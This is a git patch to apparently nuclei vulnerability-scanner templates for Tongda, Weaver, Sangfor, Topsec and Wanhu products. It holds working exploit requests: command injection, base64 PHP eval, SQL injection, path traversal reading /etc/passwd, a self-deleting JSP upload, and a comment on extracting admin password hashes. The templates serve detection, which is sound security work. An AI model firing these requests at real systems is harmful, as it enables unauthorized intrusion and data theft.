From 9e8623a907b703d3b27bd8faa882f295ee4bb60b Mon Sep 17 00:00:00 2001 From: Ritik Chaddha Date: Fri, 15 Sep 2023 00:41:38 +0530 Subject: [PATCH] templates update -2 --- .../sangfor/sangfor-login-rce.yaml | 5 +- ...eak.yaml => seeyon-initdata-exposure.yaml} | 0 ...ile.yaml => tongda-action-uploadfile.yaml} | 17 +++--- ...yaml => tongda-contact-list-exposure.yaml} | 15 ++--- .../tongda/tongda-getdata-rce.yaml | 22 ++++--- .../tongda/tongda-insert-sqli.yaml | 6 +- .../tongda/tongda-meeting-unauth.yaml | 29 +++------- .../topsec/topsec-topapplb-auth-bypass.yaml | 37 ++++++++++++ .../wanhu/wanhu-documentedit-sqli.yaml | 9 +-- .../ecology-jqueryfiletree-traversal.yaml | 34 +++++++++++ ...-e-bridge-linux-saveyzjfile-file-read.yaml | 45 --------------- ...-bridge-windows-saveyzjfile-file-read.yaml | 45 --------------- .../weaver/weaver-e-cology-getdata-sqli.yaml | 33 ----------- .../weaver-e-cology-getsqldata-sqli.yaml | 35 ------------ ...-e-cology-hrmcarreerapplyperview-sqli.yaml | 30 ---------- ...gy-jqueryfiletree-directory-traversal.yaml | 33 ----------- ...reeuploadaction-arbitrary-file-upload.yaml | 53 ----------------- .../weaver/weaver-ebridge-lfi.yaml | 50 ++++++++++++++++ ...aml => weaver-ecology-bshservlet-rce.yaml} | 26 +++++---- .../weaver-ecology-getsqldata-sqli.yaml | 39 +++++++++++++ .../weaver/weaver-ecology-hrmcareer-sqli.yaml | 35 ++++++++++++ .../weaver-ktreeuploadaction-file-upload.yaml | 57 +++++++++++++++++++ 22 files changed, 316 insertions(+), 339 deletions(-) rename http/vulnerabilities/seeyon/{seeyon-oa-initdataassess-infoleak.yaml => seeyon-initdata-exposure.yaml} (100%) rename http/vulnerabilities/tongda/{tongda-v2017-action-uploadfile.yaml => tongda-action-uploadfile.yaml} (85%) rename http/vulnerabilities/tongda/{tongda-contact-list-disclosure.yaml => tongda-contact-list-exposure.yaml} (68%) create mode 100755 http/vulnerabilities/topsec/topsec-topapplb-auth-bypass.yaml create mode 100755 http/vulnerabilities/weaver/ecology-jqueryfiletree-traversal.yaml delete mode 100644 http/vulnerabilities/weaver/weaver-e-bridge-linux-saveyzjfile-file-read.yaml delete mode 100755 http/vulnerabilities/weaver/weaver-e-cology-getsqldata-sqli.yaml delete mode 100755 http/vulnerabilities/weaver/weaver-e-cology-hrmcarreerapplyperview-sqli.yaml delete mode 100755 http/vulnerabilities/weaver/weaver-e-cology-jqueryfiletree-directory-traversal.yaml delete mode 100755 http/vulnerabilities/weaver/weaver-e-cology-ktreeuploadaction-arbitrary-file-upload.yaml create mode 100644 http/vulnerabilities/weaver/weaver-ebridge-lfi.yaml rename http/vulnerabilities/weaver/{weaver-e-cology-bshservlet-rce.yaml => weaver-ecology-bshservlet-rce.yaml} (58%) create mode 100755 http/vulnerabilities/weaver/weaver-ecology-getsqldata-sqli.yaml create mode 100755 http/vulnerabilities/weaver/weaver-ecology-hrmcareer-sqli.yaml create mode 100755 http/vulnerabilities/weaver/weaver-ktreeuploadaction-file-upload.yaml diff --git a/http/vulnerabilities/sangfor/sangfor-login-rce.yaml b/http/vulnerabilities/sangfor/sangfor-login-rce.yaml index 7cb79fe1b0..b182eaf6e1 100644 --- a/http/vulnerabilities/sangfor/sangfor-login-rce.yaml +++ b/http/vulnerabilities/sangfor/sangfor-login-rce.yaml @@ -10,9 +10,9 @@ info: - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/sangfor-login-rce.yaml metadata: max-request: 1 - fofa-query: fid="iaytNA57019/kADk8Nev7g==" verified: true - tags: sangfor,ad,rce + fofa-query: fid="iaytNA57019/kADk8Nev7g==" + tags: sangfor,rce http: - raw: @@ -23,7 +23,6 @@ http: clsMode=cls_mode_login%0Aid%0A&index=index&log_type=report&loginType=account&page=login&rnd=0&userID=admin&userPsw=123 - matchers-condition: and matchers: - type: dsl dsl: diff --git a/http/vulnerabilities/seeyon/seeyon-oa-initdataassess-infoleak.yaml b/http/vulnerabilities/seeyon/seeyon-initdata-exposure.yaml similarity index 100% rename from http/vulnerabilities/seeyon/seeyon-oa-initdataassess-infoleak.yaml rename to http/vulnerabilities/seeyon/seeyon-initdata-exposure.yaml diff --git a/http/vulnerabilities/tongda/tongda-v2017-action-uploadfile.yaml b/http/vulnerabilities/tongda/tongda-action-uploadfile.yaml similarity index 85% rename from http/vulnerabilities/tongda/tongda-v2017-action-uploadfile.yaml rename to http/vulnerabilities/tongda/tongda-action-uploadfile.yaml index bf8a174e26..33ebd44c35 100755 --- a/http/vulnerabilities/tongda/tongda-v2017-action-uploadfile.yaml +++ b/http/vulnerabilities/tongda/tongda-action-uploadfile.yaml @@ -1,7 +1,7 @@ -id: tongda-v2017-action-uploadfile +id: tongda-action-uploadfile info: - name: Tongda OA v2017 action_upload.php - Arbitrary File Upload + name: Tongda OA v2017 action_upload - Arbitrary File Upload author: SleepingBag945 severity: critical description: | @@ -11,9 +11,12 @@ info: - https://github.com/shadow1ng/fscan/blob/main/WebScan/pocs/tongda-v2017-uploadfile.yml metadata: max-request: 1 - fofa-query: app="TDXK-通达OA" verified: true - tags: tongda,fileupload + fofa-query: app="TDXK-通达OA" + tags: tongda,fileupload,intrusive + +variables: + num: "999999999" http: - raw: @@ -21,8 +24,6 @@ http: POST /module/ueditor/php/action_upload.php?action=uploadfile HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryjhddzlqp - X_requested_with: XMLHttpRequest - Accept-Encoding: gzip ------WebKitFormBoundaryjhddzlqp Content-Disposition: form-data; name="CONFIG[fileFieldName]" @@ -44,7 +45,7 @@ http: Content-Disposition: form-data; name="ffff"; filename="test.php" Content-Type: application/octet-stream - + ------WebKitFormBoundaryjhddzlqp Content-Disposition: form-data; name="mufile" @@ -59,7 +60,7 @@ http: matchers: - type: word words: - - "1f18933ca1e531c1eac9cccc4952a03b" + - '{{md5(num)}}' - type: status status: diff --git a/http/vulnerabilities/tongda/tongda-contact-list-disclosure.yaml b/http/vulnerabilities/tongda/tongda-contact-list-exposure.yaml similarity index 68% rename from http/vulnerabilities/tongda/tongda-contact-list-disclosure.yaml rename to http/vulnerabilities/tongda/tongda-contact-list-exposure.yaml index 732d8aca04..9f1ec30dfb 100755 --- a/http/vulnerabilities/tongda/tongda-contact-list-disclosure.yaml +++ b/http/vulnerabilities/tongda/tongda-contact-list-exposure.yaml @@ -1,19 +1,19 @@ -id: tongda-contact-list-disclosure +id: tongda-contact-list-exposure info: - name: Tongda OA v2014 Get Contactlistt - Exposure + name: Tongda OA v2014 Get Contactlistt - Sensitive Information Disclosure author: SleepingBag945 severity: medium description: | There is an information leakage vulnerability in the get_contactlist.php file of Tongda OA v2014. Attackers can obtain sensitive information through the vulnerability and conduct further attacks. reference: - - http://wiki.peiqi.tech/wiki/oa/通达OA/通达OA%20v2014%20get_contactlist.php%20敏感信息泄漏漏洞.html - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/tongda-contact-list-disclosure.yaml metadata: max-request: 1 - fofa-query: app="TDXK-通达OA verified: true + fofa-query: app="TDXK-通达OA" tags: tongda,oa,exposure + http: - method: GET path: @@ -23,9 +23,10 @@ http: matchers: - type: word words: - - "user_uid" - - "user_name" - - "priv_name" + - 'user_uid":' + - 'user_name":' + - 'priv_name":' + condition: and - type: status status: diff --git a/http/vulnerabilities/tongda/tongda-getdata-rce.yaml b/http/vulnerabilities/tongda/tongda-getdata-rce.yaml index 8241194a68..6695fba6a2 100755 --- a/http/vulnerabilities/tongda/tongda-getdata-rce.yaml +++ b/http/vulnerabilities/tongda/tongda-getdata-rce.yaml @@ -1,7 +1,7 @@ id: tongda-getdata-rce info: - name: Tongda OA v11.9 getadata - Remoce Code Execution + name: Tongda OA v11.9 getadata - Remote Code Execution author: SleepingBag945 severity: critical description: | @@ -10,21 +10,27 @@ info: - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E9%80%9A%E8%BE%BEOA/%E9%80%9A%E8%BE%BEOA%20v11.9%20getdata%20%E4%BB%BB%E6%84%8F%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md metadata: max-request: 1 - fofa-query: app="TDXK-通达OA" verified: true + fofa-query: app="TDXK-通达OA" tags: tongda,rce variables: - payload: "echo RCE;" + num: '999999999' + payload: "echo md5({{num}});" http: - method: GET path: - "{{BaseURL}}/general/appbuilder/web/portal/gateway/getdata?activeTab=%E5%27%19,1%3D%3Eeval(base64_decode(%22{{base64(payload)}}%22)))%3B/*&id=19&module=Carouselimage" + matchers-condition: and matchers: - - type: dsl - dsl: - - 'contains(body, "RCE") && contains(body, "pagelimit")' - - 'status_code == 200' - condition: and \ No newline at end of file + - type: word + words: + - '{{md5(num)}}' + - 'pagelimit' + condition: and + + - type: status + status: + - 200 \ No newline at end of file diff --git a/http/vulnerabilities/tongda/tongda-insert-sqli.yaml b/http/vulnerabilities/tongda/tongda-insert-sqli.yaml index e00ff40012..0cb10d5fbd 100755 --- a/http/vulnerabilities/tongda/tongda-insert-sqli.yaml +++ b/http/vulnerabilities/tongda/tongda-insert-sqli.yaml @@ -10,8 +10,8 @@ info: - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E9%80%9A%E8%BE%BEOA/%E9%80%9A%E8%BE%BEOA%20v11.6%20insert%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md metadata: max-request: 1 - fofa-query: app="TDXK-通达OA" verified: true + fofa-query: app="TDXK-通达OA" tags: tongda,sqli http: @@ -23,13 +23,15 @@ http: title)values("'"^exp(if(ascii(substr(MOD(5,2),1,1))<128,1,710)))# =1&_SERVER= - matchers-condition: and matchers: - type: word part: header words: - "PHPSESSID=" + - "register_for/?rid=" + condition: and + - type: status status: - 302 \ No newline at end of file diff --git a/http/vulnerabilities/tongda/tongda-meeting-unauth.yaml b/http/vulnerabilities/tongda/tongda-meeting-unauth.yaml index c36e8c5246..df831fe145 100755 --- a/http/vulnerabilities/tongda/tongda-meeting-unauth.yaml +++ b/http/vulnerabilities/tongda/tongda-meeting-unauth.yaml @@ -5,14 +5,13 @@ info: author: SleepingBag945 severity: medium description: | - Tongda Meeting Unauthorized Access wereDetected + Tongda Meeting Unauthorized Access were Detected. reference: - - http://wiki.peiqi.tech/wiki/oa/通达OA/通达OA%20v11.8%20getway.php%20远程文件包含漏洞.html - - https://github.com/chaitin/xray/blob/master/pocs/tongda-meeting-unauthorized-access.yml + - https://github.com/hktalent/scan4all/blob/2a7faf7862265eab33699034fd193bcf11b44e0f/config/poc/%E9%80%9A%E8%BE%BEoa/%E9%80%9A%E8%BE%BEoa-meeting-unauthorized-access.json#L10 metadata: max-request: 1 - fofa-query: app="TDXK-通达OA verified: true + fofa-query: app="TDXK-通达OA" tags: tongda,unauth,misconfig http: @@ -20,21 +19,9 @@ http: path: - "{{BaseURL}}/general/calendar/arrange/get_cal_list.php?starttime=1548058874&endtime=33165447106&view=agendaDay" - matchers-condition: and matchers: - - type: word - words: - - "creator" - - "originalTitle" - - "view" - - "type" - condition: and - - - type: word - part: header - words: - - "application/json" - - - type: status - status: - - 200 \ No newline at end of file + - type: dsl + dsl: + - status_code == 200 && contains(header, 'application/json') + - contains_all(body, 'creator\":', 'originalTitle\":', 'view\":', 'type\":') + condition: and \ No newline at end of file diff --git a/http/vulnerabilities/topsec/topsec-topapplb-auth-bypass.yaml b/http/vulnerabilities/topsec/topsec-topapplb-auth-bypass.yaml new file mode 100755 index 0000000000..fae8bd88a8 --- /dev/null +++ b/http/vulnerabilities/topsec/topsec-topapplb-auth-bypass.yaml @@ -0,0 +1,37 @@ +id: topsec-topapplb-auth-bypass + +info: + name: Topsec TopAppLB - Authentication Bypass + author: SleepingBag945 + severity: high + description: | + Topsec TopAppLB is vulnerable to authetication bypass .Enter any account on the login page, the password is `;id`. + reference: + - https://github.com/cqr-cryeye-forks/goby-pocs/blob/main/Topsec-TopAppLB-Any-account-Login.json + metadata: + max-request: 1 + verified: true + fofa-query: title="TopApp-LB 负载均衡系统" + tags: topsec,topapplb,auth-bypass + +http: + - raw: + - | + POST /login_check.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + userName=admin&password=%3Bid + + - | + GET / HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_1 == 302 && status_code_2 == 200' + - 'contains(body_2,"var IsHeadMin ")' + - 'contains(header_1,"redirect.php") && !contains(tolower(header_1), "error=1")' + condition: and \ No newline at end of file diff --git a/http/vulnerabilities/wanhu/wanhu-documentedit-sqli.yaml b/http/vulnerabilities/wanhu/wanhu-documentedit-sqli.yaml index 8ce4356906..fd801b47a6 100755 --- a/http/vulnerabilities/wanhu/wanhu-documentedit-sqli.yaml +++ b/http/vulnerabilities/wanhu/wanhu-documentedit-sqli.yaml @@ -15,17 +15,18 @@ info: fofa-query: app="万户网络-ezOFFICE" tags: wanhu,sqli + http: - raw: - | - GET /defaultroot/iWebOfficeSign/OfficeServer.jsp/../../public/iSignatureHTML.jsp/DocumentEdit.jsp?DocumentID=1';WAITFOR%20DELAY%20'0:0:5'-- HTTP/1.1 + @timeout: 15s + GET /defaultroot/iWebOfficeSign/OfficeServer.jsp/../../public/iSignatureHTML.jsp/DocumentEdit.jsp?DocumentID=1';WAITFOR%20DELAY%20'0:0:7'-- HTTP/1.1 Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded matchers: - type: dsl dsl: - - 'duration>=5' + - 'duration>=7' - 'status_code == 200' - - 'contains(body, "iSignature HTML V6")' + - 'contains_all(body, "iSignature", "DoYFSignature")' condition: and \ No newline at end of file diff --git a/http/vulnerabilities/weaver/ecology-jqueryfiletree-traversal.yaml b/http/vulnerabilities/weaver/ecology-jqueryfiletree-traversal.yaml new file mode 100755 index 0000000000..30505f4c62 --- /dev/null +++ b/http/vulnerabilities/weaver/ecology-jqueryfiletree-traversal.yaml @@ -0,0 +1,34 @@ +id: ecology-jqueryfiletree-traversal + +info: + name: Weaver E-Cology JqueryFileTree - Directory Traversal + author: SleepingBag945 + severity: medium + description: | + Panwei OA E-Cology jqueryFileTree.jsp directory traversal vulnerability. + reference: + - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/90103c248a2c52bb0a060d0ee95d5a67e4579c3d/docs/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Cology%20jqueryFileTree.jsp%20%E7%9B%AE%E5%BD%95%E9%81%8D%E5%8E%86%E6%BC%8F%E6%B4%9E.md?plain=1#L24 + metadata: + max-request: 1 + verified: true + shodan-query: ecology_JSessionid + fofa-query: app="泛微-协同办公OA" + tags: weaver,ecology,traversal,lfr + +http: + - method: GET + path: + - "{{BaseURL}}/hrm/hrm_e9/orgChart/js/jquery/plugins/jqueryFileTree/connectors/jqueryFileTree.jsp?dir=/page/resource/userfile/../../" + + matchers-condition: and + matchers: + - type: word + words: + - "'index.jsp','" + - "重命名" + - "新建目录" + condition: and + + - type: status + status: + - 200 \ No newline at end of file diff --git a/http/vulnerabilities/weaver/weaver-e-bridge-linux-saveyzjfile-file-read.yaml b/http/vulnerabilities/weaver/weaver-e-bridge-linux-saveyzjfile-file-read.yaml deleted file mode 100644 index 7f29310417..0000000000 --- a/http/vulnerabilities/weaver/weaver-e-bridge-linux-saveyzjfile-file-read.yaml +++ /dev/null @@ -1,45 +0,0 @@ -id: weaver-e-bridge-linux-saveyzjfile-file-read - -info: - name: weaver-e-bridge-linux-saveyzjfile-file-read - author: SleepingBag945 - severity: high - description: 泛微OA E-Bridge saveYZJFile接口存在任意文件读取漏洞,攻击者通过漏洞可以读取服务器任意文件 - reference: - - https://peiqi.wgpsec.org/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Bridge%20saveYZJFile%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.html - tags: eBridge,weaver,oa,read - -http: - - raw: - - | - GET /wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 - Accept: */* - Accept-Encoding: gzip - - - | - GET /file/fileNoLogin/{{idname}} HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 - Accept: */* - Accept-Encoding: gzip - - extractors: - - type: regex - name: idname - internal: true - group: 1 - regex: - - '"id":"(.*?)"' - - req-condition: true - matchers-condition: and - matchers: - - type: dsl - dsl: - - status_code_1 == 200 && contains(body_1,'id') - - "status_code_2 == 200 && contains(body_2, 'root:x:0')" - condition: and - - diff --git a/http/vulnerabilities/weaver/weaver-e-bridge-windows-saveyzjfile-file-read.yaml b/http/vulnerabilities/weaver/weaver-e-bridge-windows-saveyzjfile-file-read.yaml index 505e9fa07e..e69de29bb2 100644 --- a/http/vulnerabilities/weaver/weaver-e-bridge-windows-saveyzjfile-file-read.yaml +++ b/http/vulnerabilities/weaver/weaver-e-bridge-windows-saveyzjfile-file-read.yaml @@ -1,45 +0,0 @@ -id: weaver-e-bridge-windows-saveyzjfile-file-read - -info: - name: weaver-e-bridge-windows-saveyzjfile-file-read - author: SleepingBag945 - severity: high - description: 泛微OA E-Bridge saveYZJFile接口存在任意文件读取漏洞,攻击者通过漏洞可以读取服务器任意文件 - reference: - - https://peiqi.wgpsec.org/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Bridge%20saveYZJFile%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.html - tags: eBridge,weaver,oa,read - -http: - - raw: - - | - GET /wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///C:/&fileExt=txt HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 - Accept: */* - Accept-Encoding: gzip - - - | - GET /file/fileNoLogin/{{idname}} HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 - Accept: */* - Accept-Encoding: gzip - - extractors: - - type: regex - name: idname - internal: true - group: 1 - regex: - - '"id":"(.*?)"' - - req-condition: true - matchers-condition: and - matchers: - - type: dsl - dsl: - - status_code_1 == 200 && contains(body_1,'id') - - "status_code_2 == 200 && contains(body_2, 'Program Files')" - condition: and - - diff --git a/http/vulnerabilities/weaver/weaver-e-cology-getdata-sqli.yaml b/http/vulnerabilities/weaver/weaver-e-cology-getdata-sqli.yaml index 1aa960e3cf..e69de29bb2 100755 --- a/http/vulnerabilities/weaver/weaver-e-cology-getdata-sqli.yaml +++ b/http/vulnerabilities/weaver/weaver-e-cology-getdata-sqli.yaml @@ -1,33 +0,0 @@ -id: weaver-e-cology-getdata-sqli - -info: - name: weaver-e-cology-getdata-sqli - author: SleepingBag945 - severity: high - description: 泛微e-cology OA系统的在 getdata.jsp 中,传入参数 cmd 值等于 getSelectAllId 时, 将从请求中获取 sql 参数值执行,导致 sql 注入 - reference: - - http://wiki.peiqi.tech/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Cology%20getdata.jsp%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html - tags: ecology,weaver,oa,sqli - -http: - - raw: - - | - GET /js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%20str(40198*43774)%20as%20id HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 - Accept: */* - Accept-Encoding: gzip - - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "1759627252" - - type: status - status: - - 200 - -# Enhanced by md on 2022/10/31 -# select%20password%20as%20id%20from%20HrmResourceManager 解密后可登录 \ No newline at end of file diff --git a/http/vulnerabilities/weaver/weaver-e-cology-getsqldata-sqli.yaml b/http/vulnerabilities/weaver/weaver-e-cology-getsqldata-sqli.yaml deleted file mode 100755 index edbe68f434..0000000000 --- a/http/vulnerabilities/weaver/weaver-e-cology-getsqldata-sqli.yaml +++ /dev/null @@ -1,35 +0,0 @@ -id: weaver-e-cology-getsqldata-sqli - -info: - name: weaver-e-cology-getsqldata-sqli - author: SleepingBag945 - severity: high - description: 泛微e-cology OA系统的getSqlData接口在使用mssql数据库时,由于内置sql语句拼接不严,导致其存在sql注入漏洞 - reference: - - http://wiki.peiqi.tech/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Cology%20getSqlData%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html - tags: ecology,weaver,oa,sqli - -http: - - raw: - - | - GET /Api/portal/elementEcodeAddon/getSqlData?sql=sql=select%20@@version HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 - Accept: */* - Accept-Encoding: gzip - - - matchers-condition: and - matchers: - - type: word - part: body - words: - - '{"api_status":' - - '"status":true}' - condition: and - - - type: status - status: - - 200 - -# Enhanced by md on 2022/10/31 diff --git a/http/vulnerabilities/weaver/weaver-e-cology-hrmcarreerapplyperview-sqli.yaml b/http/vulnerabilities/weaver/weaver-e-cology-hrmcarreerapplyperview-sqli.yaml deleted file mode 100755 index 9eb6b931d0..0000000000 --- a/http/vulnerabilities/weaver/weaver-e-cology-hrmcarreerapplyperview-sqli.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: weaver-e-cology-hrmcarreerapplyperview-sqli - -info: - name: weaver-e-cology-hrmcarreerapplyperview-sqli - author: SleepingBag945 - severity: high - description: 泛微OA E-Cology HrmCareerApplyPerView.jsp 文件存在SQL注入漏洞,攻击者通过漏洞可以获取服务器数据库敏感文件 - reference: - - http://wiki.peiqi.tech/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Cology%20HrmCareerApplyPerView.jsp%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html - tags: ecology,weaver,oa,sqli - -http: - - raw: - - | - GET /pweb/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,sys.fn_sqlvarbasetostr(HashBytes('MD5','abc')),db_name(1),5,6,7 HTTP/1.1 - Host: {{Hostname}} - Content-Type: text/xml;charset=UTF-8 - - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "900150983cd24fb0d6963f7d28e17f72" - - type: status - status: - - 200 - -# Enhanced by md on 2022/10/31 diff --git a/http/vulnerabilities/weaver/weaver-e-cology-jqueryfiletree-directory-traversal.yaml b/http/vulnerabilities/weaver/weaver-e-cology-jqueryfiletree-directory-traversal.yaml deleted file mode 100755 index c5f8c22310..0000000000 --- a/http/vulnerabilities/weaver/weaver-e-cology-jqueryfiletree-directory-traversal.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: weaver-e-cology-jqueryfiletree-directory-traversal - -info: - name: weaver e-cology-jqueryfiletree-directory-traversal - author: SleepingBag945 - severity: medium - description: 泛微OA E-Cology jqueryFileTree.jsp 目录遍历漏洞 - reference: - - http://wiki.peiqi.tech/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Cology%20jqueryFileTree.jsp%20%E7%9B%AE%E5%BD%95%E9%81%8D%E5%8E%86%E6%BC%8F%E6%B4%9E.html - tags: weaver,e-cology,oa - -http: - - raw: - - | - GET /hrm/hrm_e9/orgChart/js/jquery/plugins/jqueryFileTree/connectors/jqueryFileTree.jsp?dir=/page/resource/userfile/../../ HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - - matchers-condition: and - matchers: - - type: word - words: - - "'index.jsp','" - - type: word - words: - - "重命名" - - type: word - words: - - "新建目录" - - type: status - status: - - 200 diff --git a/http/vulnerabilities/weaver/weaver-e-cology-ktreeuploadaction-arbitrary-file-upload.yaml b/http/vulnerabilities/weaver/weaver-e-cology-ktreeuploadaction-arbitrary-file-upload.yaml deleted file mode 100755 index 194fc8e07f..0000000000 --- a/http/vulnerabilities/weaver/weaver-e-cology-ktreeuploadaction-arbitrary-file-upload.yaml +++ /dev/null @@ -1,53 +0,0 @@ -id: weaver-e-cology-ktreeuploadaction-arbitrary-file-upload - -info: - name: weaver e-cology KtreeUploadAction arbitrary file upload - author: SleepingBag945 - severity: critical - description: 泛微E-Cology存在文件上传漏洞,攻击者可以通过KtreeUploadAction.jsp上传任意文件并且进一步进行利用 - reference: - - https://buaq.net/go-117479.html - tags: ecology,upload,fileupload,intrusive - -http: - - raw: - - | - POST /weaver/com.weaver.formmodel.apps.ktree.servlet.KtreeUploadAction?action=image HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 - Accept: */* - Content-Type: multipart/form-data; boundary=----WebKitFormBoundarywgljfvib - Accept-Encoding: gzip - - ------WebKitFormBoundarywgljfvib - Content-Disposition: form-data; name="test"; filename="{{randstr}}.jsp" - Content-Type: image/jpeg - - <%out.print(43997 * 41858);new java.io.File(application.getRealPath(request.getServletPath())).delete();%> - ------WebKitFormBoundarywgljfvib-- - - - | - GET {{filename}} HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 - Accept: */* - Accept-Encoding: gzip - - extractors: - - type: regex - name: filename - internal: true - group: 1 - regex: - - "','url':'(.*?)','title" - - req-condition: true - matchers-condition: and - matchers: - - type: dsl - dsl: - - "status_code_1 == 200 && contains(body_1,'original')" - - "contains(body_2, '1841626426') && status_code_2 == 200" - condition: and - -# Enhanced by md on 2022/10/31 diff --git a/http/vulnerabilities/weaver/weaver-ebridge-lfi.yaml b/http/vulnerabilities/weaver/weaver-ebridge-lfi.yaml new file mode 100644 index 0000000000..4a34c16335 --- /dev/null +++ b/http/vulnerabilities/weaver/weaver-ebridge-lfi.yaml @@ -0,0 +1,50 @@ +id: weaver-ebridge-lfi + +info: + name: Weaver E-Bidge saveYZJFile - Local File Read + author: SleepingBag945 + severity: high + description: | + There is an arbitrary file reading vulnerability in the Weaver OA E-Bridge saveYZJFile interface. An attacker can read any file on the server through the vulnerability. + reference: + - https://peiqi.wgpsec.org/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Bridge%20saveYZJFile%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.html + metadata: + max-request: 1 + verified: true + shodan-query: eBridge_JSessionid + fofa-query: app="泛微云桥e-Bridge" + tags: eBridge,weaver,oa,lfi,lfr,intrusive + +http: + - raw: + - | + GET /wxjsapi/saveYZJFile?fileName=test&downloadUrl={{path}} HTTP/1.1 + Host: {{Hostname}} + + - | + GET /file/fileNoLogin/{{idname}} HTTP/1.1 + Host: {{Hostname}} + + attack: pitchfork + payloads: + path: + - file:///C:/&fileExt=txt + - file:///etc/passwd&fileExt=txt + + stop-at-first-match: true + skip-variables-check: true + matchers: + - type: dsl + dsl: + - "status_code_1 == 200 && contains_all(body_1,'id', 'filepath') && !contains(tolower(body), 'status\":\"error')" + - "status_code_2 == 200 && contains(header_2, 'filename=')" + - "contains(body_2, 'Program Files') || regex('root:.*:0:0:', body)" + condition: and + + extractors: + - type: regex + name: idname + internal: true + group: 1 + regex: + - '"id":"(.*?)"' \ No newline at end of file diff --git a/http/vulnerabilities/weaver/weaver-e-cology-bshservlet-rce.yaml b/http/vulnerabilities/weaver/weaver-ecology-bshservlet-rce.yaml similarity index 58% rename from http/vulnerabilities/weaver/weaver-e-cology-bshservlet-rce.yaml rename to http/vulnerabilities/weaver/weaver-ecology-bshservlet-rce.yaml index 8c56b4036a..8e5c6d62c7 100755 --- a/http/vulnerabilities/weaver/weaver-e-cology-bshservlet-rce.yaml +++ b/http/vulnerabilities/weaver/weaver-ecology-bshservlet-rce.yaml @@ -1,10 +1,16 @@ -id: weaver-e-cology-bshservlet-rce +id: weaver-ecology-bshservlet-rce info: - name: Weaver E-Cology BeanShell Remote Command Execution + name: Weaver E-Cology BeanShell - Remote Command Execution author: SleepingBag945 severity: critical - description: Weaver BeanShell contains a remote command execution vulnerability in the bsh.servlet.BshServlet program. + description: | + Weaver BeanShell contains a remote command execution vulnerability in the bsh.servlet.BshServlet program. + metadata: + max-request: 1 + verified: true + shodan-query: ecology_JSessionid + fofa-query: app="泛微-协同办公OA" tags: beanshell,rce,weaver http: @@ -16,7 +22,6 @@ http: bsh.script=print%28%22{{randstr}}%22%29%3B - - raw: - | # 